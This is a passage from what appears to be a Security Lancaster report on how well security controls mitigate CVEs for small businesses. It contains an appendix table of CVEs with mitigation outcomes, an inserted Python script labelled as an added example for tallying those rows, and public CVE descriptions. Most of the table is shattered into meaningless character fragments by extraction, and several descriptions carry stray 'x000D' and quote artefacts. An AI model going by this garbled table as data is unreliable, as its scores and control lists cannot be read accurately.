ess

Co

ntr

ol

CV

E-2

01

4-0

53

6y

yy

yy

No

tM

itig

ated

Mit

igat

ed-

Pat

chM

anag

emen

tA

cces

sC

on

tro

lC

VE

-20

14

-05

62

yy

yy

yN

ot

Mit

igat

edP

arti

ally

Mit

igat

ed-

Pat

chM

anag

emen

tC

VE

-20

14

-05

77

yy

yy

yN

ot

Mit

igat

edM

itig

ated

-P

atch

Man

agem

ent

Acc

ess

Co

ntr

ol

CV

E-2

01

4-0

76

5n

nn

nn

No

tM

itig

ated

Mit

igat

ed-

Sec

ure

Co

nfi

gu

rati

on

P

atch

Man

agem

ent

CV

E-2

01

4-0

76

7n

nn

nn

No

tM

itig

ated

Mit

igat

ed-

Sec

ure

Co

nfi

gu

rati

on

P

atch

Man

agem

ent

CV

E-2

01

4-0

78

3n

nn

nn

No

tM

itig

ated

Mit

igat

ed-

Pat

chM

anag

amen

tS

ecu

reC

on

fig

ura

tio

n(P

ort

clo

sin

g)

CV

E-2

01

4-1

33

0y

yy

yy

No

tM

itig

ated

Mit

igat

ed-

Pat

chM

anag

emen

tF

irew

all

Web

site

Bla

cklis

tin

gC

VE

-20

14

-13

42

yy

yy

yN

ot

Mit

igat

edM

itig

ated

-P

atch

Man

agem

ent

Fir

ewal

lW

ebsi

teB

lack

listi

ng

CV

E-2

01

4-1

34

9y

yy

yy

No

tM

itig

ated

Mit

igat

ed-

Pat

chM

anag

emen

tF

irew

all

Acc

ess

Co

ntr

ol

CV

E-2

01

4-1

35

6y

yy

yy

No

tM

itig

ated

Mit

igat

ed-

Sec

ure

Co

nfi

gu

rati

on

M

alw

are

Pro

tect

ion

P

atch

Man

agem

ent

CV

E-2

01

4-1

37

0y

yy

yy

No

tM

itig

ated

Mit

igat

ed-

Mal

war

eP

rote

ctio

n

Pat

chM

anag

emen

tC

VE

-20

14

-13

79

yy

yy

yN

ot

Mit

igat

edM

itig

ated

-M

alw

are

Pro

tect

ion

P

atch

Man

agem

ent

CV

E-2

01

4-1

37

9n

yy

yy

No

tM

itig

ated

Mit

igat

ed-

Pat

chM

anag

emen

tA

nti

-Mal

war

eC

VE

-20

14

-13

82

yy

yy

yN

ot

Mit

igat

edM

itig

ated

-W

ebsi

teB

lack

list

Pat

chM

anag

emen

tC

VE

-20

14

-14

66

yn

nn

yN

ot

Mit

igat

edP

arti

ally

Mit

igat

ed-

Pat

chM

anag

emen

t

CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 16 of 28

CV

ES

ME

1S

ME

2S

ME

3S

ME

4Id

ealis

edN

oC

EW

ith

CE

CV

E-2

01

4-1

47

2y

nn

nn

No

tM

itig

ated

Mit

igat

ed-

Web

site

Bla

cklis

tP

atch

Man

agem

ent

CV

E-2

01

4-1

47

7y

yy

yy

No

tM

itig

ated

Mit

igat

ed-

Fir

ewal

lamp

Pat

chM

anag

amen

tC

VE

-20

14

-15

18

yy

yy

yN

ot

Mit

igat

edM

itig

ated

-F

irew

all

ampP

atch

Man

agam

ent

CV

E-2

01

4-1

56

3y

yy

yy

No

tM

itig

ated

Mit

igat

ed-

Fir

ewal

lamp

Pat

chM

anag

amen

tC

VE

-20

14

-15

65

yy

yy

yN

ot

Mit

igat

edM

itig

ated

-F

irew

all

ampP

atch

Man

agam

ent

CV

E-2

01

4-1

58

6y

yy

yy

No

tM

itig

ated

Mit

igat

ed-

Fir

ewal

lamp

Pat

chM

anag

amen

tC

VE

-20

14

-17

01

yy

yy

yN

ot

Mit

igat

edP

arti

ally

Mit

igat

ed-

Pat

chM

anag

emen

tC

VE

-20

14

-17

40

yy

yy

yN

ot

Mit

igat

edM

itig

ated

-F

irew

all

ampP

atch

Man

agam

ent

CV

E-2

01

4-1

74

4y

yy

yy

No

tM

itig

ated

Mit

igat

ed-

Fir

ewal

lamp

Pat

chM

anag

amen

tC

VE

-20

14

-17

53

yn

yy

yN

ot

Mit

igat

edM

itig

ated

-W

ebsi

teB

lack

listi

ng

ampP

atch

Man

agem

ent

CV

E-2

01

4-1

80

6y

yy

yy

No

tM

itig

ated

Mit

igat

ed-

Fir

ewal

lamp

Pat

chM

anag

amen

tC

VE

-20

14

-18

08

yy

yy

yN

ot

Mit

igat

edM

itig

ated

-F

irew

all

Web

site

Bla

cklis

tin

gamp

Pat

chM

anag

amen

tC

VE

-20

14

-18

11

yy

yy

yN

ot

Mit

igat

edM

itig

ated

-F

irew

all

CV

E-2

01

4-1

81

2y

yy

yy

No

tM

itig

ated

Mit

igat

ed-

Str

on

gP

assw

ord

s(U

ser

Acc

ess)

CV

E-2

01

4-2

01

4n

nn

nn

No

tM

itig

ated

Mit

igat

ed-

Sec

ure

Co

nfi

gu

rati

on

P

atch

Man

agem

ent

CV

E-2

01

4-2

10

3n

nn

nn

No

tM

itig

ated

Mit

igat

ed-

Fir

ewal

lA

nti

DO

SC

VE

-20

14

-21

09

nn

nn

nN

ot

Mit

igat

edM

itig

ated

-F

irew

all

ampP

atch

Man

agem

ent

CV

E-2

01

4-2

36

4n

nn

nn

No

tM

itig

ated

Par

tial

lyM

itig

ated

-P

atch

Man

agem

ent

CV

E-2

01

4-2

41

6n

yy

nn

No

tM

itig

ated

Par

tial

lyM

itig

ated

-P

atch

Man

agem

ent

CV

E-2

01

4-2

55

4n

ny

nn

No

tM

itig

ated

Mit

igat

ed-

Pat

chM

anag

emen

tA

cces

sC

on

tro

lW

ebsi

teB

lack

listi

ng

CV

E-2

01

4-2

64

3n

yn

nn

No

tM

itig

ated

Mit

igat

ed-

Pat

chM

anag

emen

tS

tro

ng

Pas

swor

ds

(Use

rA

cces

s)C

VE

-20

14

-27

42

nn

nn

nN

ot

Mit

igat

edM

itig

ated

-F

irew

all

An

tiD

OS

CV

E-2

01

4-2

76

8y

ny

yn

No

tM

itig

ated

Mit

igat

ed-

Web

site

Bla

cklis

tin

g

Sec

ure

Co

nfi

gu

rati

on

(Sec

ure

Bro

wse

r)

Pat

chM

anag

emen

tC

VE

-20

14

-27

89

yn

yy

nN

ot

Mit

igat

edM

itig

ated

-W

ebsi

teB

lack

listi

ng

S

ecu

reC

on

fig

ura

tio

n(S

ecu

reB

row

ser)

P

atch

Man

agem

ent

CV

E-2

01

4-2

79

1y

ny

yn

No

tM

itig

ated

Mit

igat

ed-

Web

site

Bla

cklis

tin

g

Sec

ure

Co

nfi

gu

rati

on

(Sec

ure

Bro

wse

r)

Pat

chM

anag

emen

tC

VE

-20

14

-27

94

yn

yy

nN

ot

Mit

igat

edM

itig

ated

-W

ebsi

teB

lack

listi

ng

S

ecu

reC

on

fig

ura

tio

n(S

ecu

reB

row

ser)

P

atch

Man

agem

ent

CV

E-2

01

4-2

80

8y

ny

yn

No

tM

itig

ated

Mit

igat

ed-

Web

site

Bla

cklis

tin

g

Sec

ure

Co

nfi

gu

rati

on

(Sec

ure

Bro

wse

r)

Pat

chM

anag

emen

tC

VE

-20

14

-28

21

yn

yy

nN

ot

Mit

igat

edM

itig

ated

-W

ebsi

teB

lack

listi

ng

S

ecu

reC

on

fig

ura

tio

n(S

ecu

reB

row

ser)

P

atch

Man

agem

ent

CV

E-2

01

4-3

44

4n

nn

yn

No

tM

itig

ated

Mit

igat

ed-

An

ti-M

alw

are

Pat

chM

anag

emen

tC

VE

-20

14

-34

89

nn

nn

nN

ot

Mit

igat

edM

itig

ated

-S

tro

ng

Pas

swor

ds

(Use

rA

cces

s)C

VE

-20

14

-35

07

nn

yy

yN

ot

Mit

igat

edM

itig

ated

-F

irew

all

ampP

atch

Man

agem

ent

CV

E-2

01

4-3

55

6y

ny

ny

No

tM

itig

ated

Par

tial

lyM

itig

ated

-P

atch

Man

agem

ent

CV

E-2

01

4-3

58

0y

yy

nn

No

tM

itig

ated

Mit

igat

ed-

Fir

ewal

lA

nti

DO

S

Pat

chM

anag

emen

tC

VE

-20

14

-38

14

nn

nn

nN

ot

Mit

igat

edM

itig

ated

-S

tro

ng

Pas

swor

ds

(Use

rA

cces

s)C

VE

-20

14

-38

19

nn

nn

nN

ot

Mit

igat

edM

itig

ated

-F

irew

all

An

ti-D

os

Fir

mw

are

Up

dat

esC

VE

-20

14

-38

72

nn

nn

nN

ot

Mit

igat

edM

itig

ated

-S

ecu

reC

on

fig

ura

tio

namp

Pat

chM

anag

emen

tC

VE

-20

14

-40

44

nn

nn

nN

ot

Mit

igat

edP

arti

ally

Mit

igat

ed-

Pat

chM

anag

emen

tC

VE

-20

14

-40

79

yn

yy

nN

ot

Mit

igat

edM

itig

ated

-W

ebsi

teB

lack

listi

ng

S

ecu

reC

on

fig

ura

tio

n(S

ecu

reB

row

ser)

P

atch

Man

agem

ent

CV

E-2

01

4-4

08

2y

ny

yn

No

tM

itig

ated

Mit

igat

ed-

Web

site

Bla

cklis

tin

g

Sec

ure

Co

nfi

gu

rati

on

(Sec

ure

Bro

wse

r)

Pat

chM

anag

emen

tC

VE

-20

14

-41

00

yn

yy

nN

ot

Mit

igat

edM

itig

ated

-W

ebsi

teB

lack

listi

ng

S

ecu

reC

on

fig

ura

tio

n(S

ecu

reB

row

ser)

P

atch

Man

agem

ent

CV

E-2

01

4-4

10

5y

ny

yn

No

tM

itig

ated

Mit

igat

ed-

Web

site

Bla

cklis

tin

g

Sec

ure

Co

nfi

gu

rati

on

(Sec

ure

Bro

wse

r)

Pat

chM

anag

emen

tC

VE

-20

14

-41

14

yy

yy

nN

ot

Mit

igat

edM

itig

ated

-A

nti

-Mal

war

eC

VE

-20

14

-41

27

yn

yy

nN

ot

Mit

igat

edM

itig

ated

-W

ebsi

teB

lack

listi

ng

S

ecu

reC

on

fig

ura

tio

n(S

ecu

reB

row

ser)

P

atch

Man

agem

ent

CV

E-2

01

4-4

13

0y

ny

yn

No

tM

itig

ated

Mit

igat

ed-

Web

site

Bla

cklis

tin

g

Sec

ure

Co

nfi

gu

rati

on

(Sec

ure

Bro

wse

r)

Pat

chM

anag

emen

tC

VE

-20

14

-41

32

yn

yy

nN

ot

Mit

igat

edM

itig

ated

-W

ebsi

teB

lack

listi

ng

S

ecu

reC

on

fig

ura

tio

n(S

ecu

reB

row

ser)

P

atch

Man

agem

ent

CV

E-2

01

4-4

13

3y

ny

yn

No

tM

itig

ated

Mit

igat

ed-

Web

site

Bla

cklis

tin

g

Sec

ure

Co

nfi

gu

rati

on

(Sec

ure

Bro

wse

r)

Pat

chM

anag

emen

t

CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 17 of 28

CV

ES

ME

1S

ME

2S

ME

3S

ME

4Id

ealis

edN

oC

EW

ith

CE

CV

E-2

01

4-4

14

1y

ny

yn

No

tM

itig

ated

Mit

igat

ed-

Web

site

Bla

cklis

tin

g

Sec

ure

Co

nfi

gu

rati

on

(Sec

ure

Bro

wse

r)

Pat

chM

anag

emen

tC

VE

-20

14

-44

81

yy

yy

yN

ot

Mit

igat

edM

itig

ated

-P

atch

Man

agem

ent

An

ti-M

alw

are

CV

E-2

01

4-4

61

7y

yn

nn

No

tM

itig

ated

Mit

igat

ed-

Fir

ewal

lP

atch

Man

agem

ent

CV

E-2

01

4-4

63

1n

nn

nn

No

tM

itig

ated

Par

tial

lyM

itig

ated

-P

atch

Man

agem

ent

Sec

ure

Co

nfi

gu

rati

on

CV

E-2

01

4-6

04

0n

nn

nn

No

tM

itig

ated

Par

tial

lyM

itig

ated

-P

atch

Man

agem

ent

CV

E-2

01

4-6

10

5n

nn

nn

No

tM

itig

ated

Mit

igat

ed-

Fir

ewal

lP

atch

Man

agem

ent

CV

E-2

01

4-6

13

6n

nn

nn

No

tM

itig

ated

Mit

igat

ed-

Sec

ure

Co

nfi

gu

rati

on

P

atch

Man

agem

ent

CV

E-2

01

4-6

36

3y

ny

yn

No

tM

itig

ated

Mit

igat

ed-

Web

site

Bla

cklis

tin

g

Sec

ure

Co

nfi

gu

rati

on

(Sec

ure

Bro

wse

r)

Pat

chM

anag

emen

tC

VE

-20

14

-63

69

yn

yy

No

tM

itig

ated

Mit

igat

ed-

Web

site

Bla

cklis

tin

g

Sec

ure

Co

nfi

gu

rati

on

(Sec

ure

Bro

wse

r)

Pat

chM

anag

emen

tC

VE

-20

14

-63

78

nn

nn

nn

No

tM

itig

ated

Mit

igat

ed-

Fir

ewal

lP

atch

Man

agem

ent

CV

E-2

01

4-6

48

7n

ny

nn

No

tM

itig

ated

Par

tial

lyM

itig

ated

-P

atch

Man

agem

ent

CV

E-2

01

4-7

25

0n

yy

nn

No

tM

itig

ated

Mit

igat

ed-

Fir

ewal

lP

atch

Man

agem

ent

CV

E-2

01

4-7

92

7y

yy

yn

No

tM

itig

ated

Mit

igat

ed-

Fir

ewal

lS

ecu

reC

on

fig

ura

tio

n(A

cces

sC

on

tro

l)

Pat

chM

anag

emen

tC

VE

-20

14

-79

45

yy

yy

nN

ot

Mit

igat

edP

arti

ally

Mit

igat

ed-

Pat

chM

anag

emen

tC

VE

-20

14

-84

47

yy

yy

nN

ot

Mit

igat

edP

arti

ally

Mit

igat

ed-

An

ti-M

alw

are

Pat

chM

anag

emen

tC

VE

-20

14

-86

38

yy

yy

yN

ot

Mit

igat

edM

itig

ated

-W

ebsi

teB

lack

listi

ng

S

ecu

reC

on

fig

ura

tio

n(S

ecu

reB

row

ser)

P

atch

Man

agem

ent

CV

E-2

01

4-8

83

5y

yy

yy

No

tM

itig

ated

Par

tial

lyM

itig

ated

-P

atch

Man

agem

ent

CV

E-2

01

4-9

15

9y

yy

yy

No

tM

itig

ated

Par

tial

lyM

itig

ated

-A

nti

-Mal

war

eP

atch

Man

agem

ent

[Tim

eD

elay

]C

VE

-20

14

-91

63

yy

yy

yN

ot

Mit

igat

edP

arti

ally

Mit

igat

ed-

An

ti-M

alw

are

Pat

chM

anag

emen

t[T

ime

Del

ay]

CV

E-2

01

4-9

35

0y

yy

yn

No

tM

itig

ated

Mit

igat

ed-

Fir

ewal

lA

nti

-Do

sF

irm

war

eU

pd

ates

CV

E-2

01

4-9

35

7n

nn

nn

No

tM

itig

ated

Par

tial

lyM

itig

ated

-P

atch

Man

agem

ent

An

ti-M

alw

are

Sec

ure

Co

nfi

gu

rati

on

CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 18 of 28
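To re-derive summary counts from rows in the layout of the table above (CVE, the four SME flags, the Idealised flag, the "No CE" outcome, and the "With CE" outcome followed by the credited controls), here is an added example that is not part of the report and not the authors' own tooling. It parses rows in that layout, tallies the three outcomes, counts how often each control is credited (with any parenthetical qualifier stripped, so "Secure Configuration (Secure Browser)" counts under Secure Configuration) and counts the "y" flags per profile. The five sample rows are a constructed subset copied from the table; one has a blank Idealised cell, as one row of the table does, and the y/n columns are counted as recorded without interpreting what the flag means. All function and constant names are this example's own.

```python
"""Tally outcomes, credited controls and y/n flags from rows laid out like the
appendix table: CVE | SME1 | SME2 | SME3 | SME4 | Idealised | No CE | With CE."""
from collections import Counter

# Constructed sample: five rows copied from the table above (not the full appendix).
# The last row has a blank Idealised cell, as one row of the source table does.
SAMPLE_ROWS = """\
CVE | SME1 | SME2 | SME3 | SME4 | Idealised | No CE | With CE
CVE-2013-0008 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall, Secure Configuration (User Policy), Anti-Malware
CVE-2013-0140 | y | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-1140 | n | n | n | n | n | Not Mitigated | Not Mitigated - Secure Configuration (Don't install)
CVE-2013-2350 | n | y | n | n | y | Not Mitigated | Partially Mitigated - Patch Management & Firewall
CVE-2014-6369 | y | n | y | y |   | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
"""

OUTCOMES = ("Mitigated", "Partially Mitigated", "Not Mitigated")
PROFILES = ("SME1", "SME2", "SME3", "SME4", "Idealised")


def split_controls(text):
    """Split 'A, B & C (x & y)' into ['A', 'B', 'C (x & y)'].
    A comma or '&' inside parentheses belongs to the control name, not to the list."""
    parts, buf, depth = [], "", 0
    for ch in text:
        if ch == "(":
            depth += 1
        elif ch == ")":
            depth -= 1
        if ch in ",&" and depth == 0:
            parts.append(buf.strip())
            buf = ""
        else:
            buf += ch
    parts.append(buf.strip())
    return [p for p in parts if p]


def base_control(name):
    """'Secure Configuration (Secure Browser)' -> 'Secure Configuration'."""
    return name.split("(", 1)[0].strip()


def parse_row(line):
    """Parse one table row; returns None for the header, blank or malformed lines."""
    cells = [c.strip() for c in line.split("|")]
    if len(cells) != 8 or not cells[0].startswith("CVE-"):
        return None
    outcome, sep, controls = cells[7].partition(" - ")
    if cells[6] not in OUTCOMES or outcome not in OUTCOMES:
        raise ValueError(f"{cells[0]}: unknown outcome in {cells[6]!r} / {outcome!r}")
    return {
        "cve": cells[0],
        # y/n per profile; a blank cell is a gap in the source and is kept as None
        "flags": {p: (None if f == "" else f.lower() == "y")
                  for p, f in zip(PROFILES, cells[1:6])},
        "no_ce": cells[6],
        "outcome": outcome,
        "controls": split_controls(controls) if sep else [],
    }


def summarise(text):
    """Outcome counts, per-control credit counts (qualifier stripped),
    per-profile 'y' counts and the number of blank flag cells."""
    rows = [r for r in map(parse_row, text.splitlines()) if r]
    outcomes = Counter(r["outcome"] for r in rows)
    controls = Counter()
    for r in rows:
        # a control credited twice in one row (e.g. two qualifiers) counts once
        controls.update({base_control(c) for c in r["controls"]})
    flagged, gaps = Counter(), 0
    for r in rows:
        for profile, flag in r["flags"].items():
            if flag is None:
                gaps += 1
            elif flag:
                flagged[profile] += 1
    return {"rows": len(rows), "outcomes": outcomes, "controls": controls,
            "flagged": flagged, "gaps": gaps}


if __name__ == "__main__":
    for key, value in summarise(SAMPLE_ROWS).items():
        print(key, dict(value) if isinstance(value, Counter) else value)
```

Run against the full table instead of the sample, the same functions give the per-control totals the report's analysis section summarises; rows with a blank flag cell are reported in `gaps` rather than silently counted as "n".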

CVE DetailsCVE-2013-0008

rdquowin32ksys in the kernel-mode driversin Microsoft Windows Vista SP2 x000DWindows Server 2008 SP2 R2 and R2 SP1Windows 7 Gold and SP1 x000D Windows8 Windows Server 2012 and Windows RTdoes not properly x000D handle windowbroadcast messages which allows localusers to gain x000D privileges via acrafted application aka rdquordquoWin32k ImproperMessage x000D Handling Vulnerabilityrdquordquordquo

CVE-2013-0022rdquoUse-after-free vulnerability in MicrosoftInternet Explorer 9 allows x000D remoteattackers to execute arbitrary code viaa crafted web site that x000D triggersaccess to a deleted object aka rdquordquoInternetExplorer x000D LsGetTrailInfo Use AfterFree Vulnerabilityrdquordquordquo

CVE-2013-0084rdquoDirectory traversal vulnerability inMicrosoft SharePoint Server 2010 x000DSP1 and SharePoint Foundation 2010 SP1allows remote attackers to x000D bypassintended read restrictions for contentand hijack user x000D accounts via acrafted URL aka rdquordquoSharePoint DirectoryTraversal x000D Vulnerabilityrdquordquordquo

CVE-2013-0140SQL injection vulnerability in the Agent-Handler component in McAfee x000DePolicy Orchestrator (ePO) before 457and 46x before 466 allows x000Dremote attackers to execute arbitrary SQLcommands via a crafted x000D requestover the Agent-Server communicationchannel

CVE-2013-0149The OSPF implementation in Cisco IOS120 through 124 and 150 x000D through153 IOS-XE 2x through 39xS ASA andPIX 7x through 91 x000D FWSMNX-OS and StarOS before 14050488does not properly validate x000D LinkState Advertisement (LSA) type 1 packetsbefore performing x000D operations onthe LSA database which allows remoteattackers to cause x000D a denial ofservice (routing disruption) or obtainsensitive packet x000D information viaa (1) unicast or (2) multicast packetaka Bug IDs x000D CSCug34485CSCug34469 CSCug39762 CSCug63304and CSCug39795

CVE-2013-0172Samba 40x before 401 in certainActive Directory x000D domain-controllerconfigurations does not properly interpretAccess x000D Control Entries that arebased on an objectClass which allowsremote x000D authenticated users tobypass intended restrictions on modifyingLDAP x000D directory objects byleveraging (1) objectClass access by auser (2) x000D objectClass access by agroup or (3) write access to an attribute

CVE-2013-0174The external node classifier (ENC) APIin Foreman before 11 allows x000Dremote attackers to obtain the hashed rootpassword via an API x000D request

CVE-2013-0199The default LDAP ACIs in FreeIPA30 before 312 do not restrict x000Daccess to the (1) ipaNTTrustAuthIncomingand (2) x000D ipaNTTrustAuthOutgoingattributes which allow remote attackersto x000D obtain the Cross-Realm KerberosTrust key via unspecified vectors

CVE-2013-0253The default configuration of Apache Maven304 when using Maven x000D Wagon21 disables SSL certificate checks whichallows remote x000D attackers to spoofservers via a man-in-the-middle (MITM)attack

CVE-2013-0270OpenStack Keystone Grizzly before 20131Folsom and possibly earlier x000D allowsremote attackers to cause a denial of service(CPU and memory x000D consumption)via a large HTTP request as demonstratedby a long x000D tenant name whenrequesting a token

CVE-2013-0481The console in IBM Sterling B2B Integrator51 and 52 and Sterling File Gateway 21and 22 allows remote attackers to readstack traces by triggering (1) an error or(2) an exception

CVE-2013-0598Cross-site request forgery (CSRF)vulnerability in the Web Client in x000DIBM Rational ClearQuest 71 before71212 80 before 8008 and x000D801 before 8011 allows remote attackersto hijack the x000D authentication ofarbitrary users

CVE-2013-0619Adobe Reader and Acrobat 9x before 95310x before 1015 and x000D 11x before1101 allow attackers to execute arbitrarycode or cause x000D a denial of service(memory corruption) via unspecified vectorsa x000D different vulnerability than CVE-2012-1530 CVE-2013-0601 x000D CVE-2013-0605 CVE-2013-0616 CVE-2013-0620 and CVE-2013-0623

CVE-2013-0633Buffer overflow in Adobe Flash Playerbefore 10318351 and 11x before115502149 on Windows and Mac OSX before 10318351 and 11x before112202262 on Linux before 11111132on Android 2x and 3x and before11111537 on Android 4x allows remoteattackers to execute arbitrary code viacrafted SWF content as exploited in thewild in February 2013

CVE-2013-0649: Use-after-free vulnerability in Adobe Flash Player before 10.3.183.63 and 11.x before 11.6.602.168 on Windows, before 10.3.183.61 and 11.x before 11.6.602.167 on Mac OS X, before 10.3.183.61 and 11.x before 11.2.202.270 on Linux, before 11.1.111.43 on Android 2.x and 3.x, and before 11.1.115.47 on Android 4.x; Adobe AIR before 3.6.0.597; and Adobe AIR SDK before 3.6.0.599 allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2013-0644 and CVE-2013-1374.

CVE-2013-0746: Mozilla Firefox before 18.0, Firefox ESR 10.x before 10.0.12 and 17.x before 17.0.2, Thunderbird before 17.0.2, Thunderbird ESR 10.x before 10.0.12 and 17.x before 17.0.2, and SeaMonkey before 2.15 do not properly implement quickstubs that use the jsval data type for their return values, which allows remote attackers to execute arbitrary code or cause a denial of service (compartment mismatch and application crash) via crafted JavaScript code that is not properly handled during garbage collection.

CVE-2013-0753: Use-after-free vulnerability in the serializeToStream implementation in the XMLSerializer component in Mozilla Firefox before 18.0, Firefox ESR 10.x before 10.0.12 and 17.x before 17.0.2, Thunderbird before 17.0.2, Thunderbird ESR 10.x before 10.0.12 and 17.x before 17.0.2, and SeaMonkey before 2.15 allows remote attackers to execute arbitrary code via crafted web content.

CVE-2013-0787: Use-after-free vulnerability in the nsEditor::IsPreformatted function in editor/libeditor/base/nsEditor.cpp in Mozilla Firefox before 19.0.2, Firefox ESR 17.x before 17.0.4, Thunderbird before 17.0.4, Thunderbird ESR 17.x before 17.0.4, and SeaMonkey before 2.16.1 allows remote attackers to execute arbitrary code via vectors involving an execCommand call.

CVE-2013-0909: The XSS Auditor in Google Chrome before 25.0.1364.152 allows remote attackers to obtain sensitive HTTP Referer information via unspecified vectors.

CVE-2013-1035: The iTunes ActiveX control in Apple iTunes before 11.1 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site.

CVE-2013-1102: The Wireless Intrusion Prevention System (wIPS) component on Cisco Wireless LAN Controller (WLC) devices with software 7.0 before 7.0.235.0, 7.1, and 7.2 before 7.2.110.0, and 7.3 before 7.3.101.0 allows remote attackers to cause a denial of service (device reload) via crafted IP packets, aka Bug ID CSCtx80743.

CVE-2013-1140: The XML parser in Cisco Security Monitoring, Analysis, and Response System (MARS) allows remote attackers to read arbitrary files via an external entity declaration in conjunction with an entity reference, related to an XML External Entity (XXE) issue, aka Bug ID CSCue55093.

CYBER SECURITY CONTROLS EFFECTIVENESS — Security Lancaster Page 19 of 28

CVE-2013-1144: Memory leak in the IKEv1 implementation in Cisco IOS 15.1 allows remote attackers to cause a denial of service (memory consumption) via unspecified (1) IPv4 or (2) IPv6 IKE packets, aka Bug ID CSCth81055.

CVE-2013-1153: Cross-site request forgery (CSRF) vulnerability in the web interface in Cisco Prime Infrastructure allows remote attackers to hijack the authentication of arbitrary users, aka Bug ID CSCue84676.

CVE-2013-1181: Cisco NX-OS on Nexus 5500 devices 4.x and 5.x before 5.0(3)N2(2), Nexus 3000 devices 5.x before 5.0(3)U3(2), and Unified Computing System (UCS) 6200 devices before 2.0(1w) allows remote attackers to cause a denial of service (device reload) by sending a jumbo packet to the management interface, aka Bug IDs CSCtx17544, CSCts10593, and CSCtx95389.

CVE-2013-1303: Use-after-free vulnerability in Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer Use After Free Vulnerability," a different vulnerability than CVE-2013-1304 and CVE-2013-1338.

CVE-2013-1384: Adobe Shockwave Player before 12.0.2.122 allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2013-1386.

CVE-2013-1388: Unspecified vulnerability in Adobe ColdFusion 9.0 before Update 10, 9.0.1 before Update 9, 9.0.2 before Update 4, and 10 before Update 9 allows attackers to obtain administrator-console access via unknown vectors.

CVE-2013-1450: Microsoft Internet Explorer 8 and 9, when the Proxy Settings configuration has the same Proxy address and Port values in the HTTP and Secure rows, does not properly reuse TCP sessions to the proxy server, which allows remote attackers to obtain sensitive information intended for a specific host via a crafted HTML document that triggers many HTTPS requests and then triggers an HTTP request to that host, as demonstrated by reading a Cookie header, aka MSRC 12096gd.

CVE-2013-1472: Unspecified vulnerability in the JavaFX component in Oracle Java SE JavaFX 2.2.4 and earlier allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors, a different vulnerability than other CVEs listed in the February 2013 CPU.

CVE-2013-1553: Unspecified vulnerability in the Oracle Web Services Manager component in Oracle Fusion Middleware 11.1.1.6.0 allows remote attackers to affect confidentiality and integrity via unknown vectors related to Web Services Security.

CVE-2013-1620: The TLS implementation in Mozilla Network Security Services (NSS) does not properly consider timing side-channel attacks on a noncompliant MAC check operation during the processing of malformed CBC padding, which allows remote attackers to conduct distinguishing attacks and plaintext-recovery attacks via statistical analysis of timing data for crafted packets, a related issue to CVE-2013-0169.

CVE-2013-1627: Absolute path traversal vulnerability in NTWebServer.exe in Indusoft Studio 7.0 and earlier and Advantech Studio 7.0 and earlier allows remote attackers to read arbitrary files via a full pathname in an argument to the sub_401A90 CreateFileW function.

CVE-2013-1638: Opera before 12.13 allows remote attackers to execute arbitrary code via crafted clipPaths in an SVG document.

CVE-2013-1669: Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 21.0 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.

CVE-2013-1676: The SelectionIterator::GetNextSegment function in Mozilla Firefox before 21.0, Firefox ESR 17.x before 17.0.6, Thunderbird before 17.0.6, and Thunderbird ESR 17.x before 17.0.6 allows remote attackers to execute arbitrary code or cause a denial of service (out-of-bounds read) via unspecified vectors.

CVE-2013-1700: The Mozilla Maintenance Service in Mozilla Firefox before 22.0 on Windows does not properly handle inability to launch the Mozilla Updater executable file, which allows local users to gain privileges via vectors involving placement of a Trojan horse executable file at an arbitrary location.

CVE-2013-1734: Cross-site request forgery (CSRF) vulnerability in attachment.cgi in Bugzilla 2.x, 3.x, and 4.0.x before 4.0.11; 4.1.x and 4.2.x before 4.2.7; and 4.3.x and 4.4.x before 4.4.1 allows remote attackers to hijack the authentication of arbitrary users for requests that commit an attachment change via an update action.

CVE-2013-1777: The JMX Remoting functionality in Apache Geronimo 3.x before 3.0.1, as used in IBM WebSphere Application Server (WAS) Community Edition 3.0.0.3 and other products, does not properly implement the RMI classloader, which allows remote attackers to execute arbitrary code by using the JMX connector to send a crafted serialized object.

CVE-2013-2319: FileMaker Pro before 12 and Pro Advanced before 12 does not verify X.509 certificates from SSL servers, which allows man-in-the-middle attackers to spoof servers and obtain sensitive information via a crafted certificate.

CVE-2013-2340: Unspecified vulnerability on the HP ProCurve JCA, JCB, JDA, JDB, JEA, JFA, JFB, JFC, JGA, 658250-B21, and 658247-B21; HP 3COM routers and switches; and HP H3C routers and switches allows remote attackers to execute arbitrary code or obtain sensitive information via unknown vectors.

CVE-2013-2350: Unspecified vulnerability in HP Storage Data Protector 6.2X allows remote attackers to execute arbitrary code or cause a denial of service via unknown vectors, aka ZDI-CAN-1897.

CVE-2013-2492: Stack-based buffer overflow in Firebird 2.1.3 through 2.1.5 before 18514, and 2.5.1 through 2.5.3 before 26623, on Windows allows remote attackers to execute arbitrary code via a crafted packet to TCP port 3050, related to a missing size check during extraction of a group number from CNCT information.

CVE-2013-2507: Multiple cross-site scripting (XSS) vulnerabilities in the Brother MFC-9970CDW printer with firmware G (1.03) allow remote attackers to inject arbitrary web script or HTML via the (1) id parameter to admin/log_to_net.html or (2) kind parameter to fax/copy_settings.html, a different vulnerability than CVE-2013-2670 and CVE-2013-2671.

CVE-2013-2736: Adobe Reader and Acrobat 9.x before 9.5.5, 10.x before 10.1.7, and 11.x before 11.0.03 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2013-2718, CVE-2013-2719, CVE-2013-2720, CVE-2013-2721, CVE-2013-2722, CVE-2013-2723, CVE-2013-2725, CVE-2013-2726, CVE-2013-2731, CVE-2013-2732, CVE-2013-2734, CVE-2013-2735, CVE-2013-3337, CVE-2013-3338, CVE-2013-3339, CVE-2013-3340, and CVE-2013-3341.

